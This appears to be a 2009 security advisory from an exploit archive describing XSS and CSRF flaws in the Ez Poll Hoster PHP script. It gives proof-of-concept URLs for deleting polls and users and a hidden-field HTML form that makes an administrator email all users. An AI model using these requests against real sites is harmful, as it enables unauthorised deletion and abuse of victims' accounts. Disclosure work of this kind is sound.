Ez Poll Hoster XSS / XSRF

Ez Poll Hoster XSS / XSRF: Posted Dec 15, 2009; Authored by Milos Zivanovic; Ez Poll Hoster suffers from multiple cross site scripting and cross site request forgery vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | ad5f86bc0a6016aa1161ffae170f714181e5cb8ce781dc1d55f4da9ad49a3c33; Download | Favorite | View

Ez Poll Hoster XSS / XSRF

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--User panel
 |  |--XSS in user panel
 |  |--Delete poll by name
 |
 |--Admin panel
    |--XSS in admin panel
    |--Delete user by name
    |--Email all users

[#]User panel

[-]XSS in user panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete poll by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL
NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[#]Admin panel

[-]XSS in admin panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete user by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER
NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[-]Email all users

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
  <input type="hidden" name="subject" value="this is my subject">
  <input type="hidden" name="message" value="this is my message">
  <input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#] EOF

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Ez Poll Hoster XSS / XSRF

Ez Poll Hoster XSS / XSRF

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ez Poll Hoster XSS / XSRF

Share This

Ez Poll Hoster XSS / XSRF

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems